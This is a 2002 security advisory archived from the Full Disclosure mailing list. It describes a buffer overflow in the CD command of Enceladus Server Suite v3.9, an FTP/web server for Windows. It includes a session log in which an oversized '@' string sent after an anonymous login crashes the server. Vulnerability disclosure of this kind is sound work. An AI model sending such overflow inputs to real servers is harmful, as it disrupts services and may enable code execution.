Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability
From: Tamer Sahin <ts () securityoffice net>
Date: Mon, 9 Dec 2002 20:32:42 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ Enceladus Server Suite v3.9 Buffer Overflow Vulnerability ]--

- --[ Type

Buffer Overflow

- --[ Release Date

December 09, 2002

- --[ Product / Vendor

Enceladus Server Suite is an Internet/Intranet lightweight Web and FTP Server for
Windows, provides secure file sharing on any network. Perfect for Broadband, Cable
Modem, Small business and Personal Use. You don't have to be an expert to setup
file sharing or run your own web site and FTP Server. This Server Suite is One of
the Easiest To Install and Operate.

http://www.mollensoft.com

- --[ Summary

Enceladus Server Suite is vulnerable to a buffer overflow condition. An attacker
may supply a long sequence of characters as an argument to "CD" command.
If the length of the supplied string exceeds the size of its input buffer, the
excess data will overwrite other variables on the stack and the stack frame
 itself. It is possible for a malicious user to craft a request that will result in code
execution on the vulnerable system.

- --[ Tested

Enceladus Server Suite v3.9 / Windows 2000 sp3
Enceladus Server Suite v3.9 / Windows 98 SE

- --[ Vulnerable

Enceladus Server Suite v3.9 / Windows 2000 sp3
Enceladus Server Suite v3.9 / Windows 98 SE

- --[ Analysis

An analysis for this vulnerability exists and is available below.

==================== SNIP ====================

ts () metacortex:~$ ftp 192.168.10.2
Connected to 192.168.10.2.
220 Mollensoft FTP Server Ready.
Name (192.168.10.2:ts): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
500 'EPSV': command not understood.
227 Entering Passive Mode (192,168,10,2,6,160)
150 Data connection open for PASV transfer.
- -rwxr-xr-x  1 User     Group           6468 Feb 17 01:13 index.html
- -rwxr-xr-x  1 User     Group             70 Oct 31 04:52 readme.txt
226 Listing complete.
ftp> cd @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
421 Service not available, remote server has closed connection.

==================== SNIP ====================

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of
any of the information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin
ts () securityoffice net
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedback () securityoffice net

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this Security
Advisory is not modified in any way and is attributed to SecurityOffice and provided
that such reproduction and distribution is performed for non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPfThzPpL5ibJRTtBAQFkSgf/V6EljpHwn3GoOnHK2eqfJjIqVSYSbVLc
377H5BbEqwW9e3mcJK8o/biPDwuo8ccdby+gJCrpFC0CUO1ctWq5xFsnR/H3MBe0
Kn8m71n9xn4H3Xvewoq4fUQ4IQ2lfTFYwjJHNsI9oOJXKGJzuKmgv+z/z11+1WTG
kYyWehB6m9M5VbVoPfQftDAZuTlZHIVHe2f+sCVtzAJkpikeMCRdQAV/GKpbb+7i
niqD8uIYFWrvzwy1u0XFGcLElkMttd61Ev0PyKqLLIjycAlH7izll/eAZEljA6H1
pnMeUN3g/osD+d9se5bFBKvBkgzHG62Ubtr754P75+fidCdRkBk+qQ==
=niU/
-----END PGP SIGNATURE-----



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
  • [SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability Tamer Sahin (Dec 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault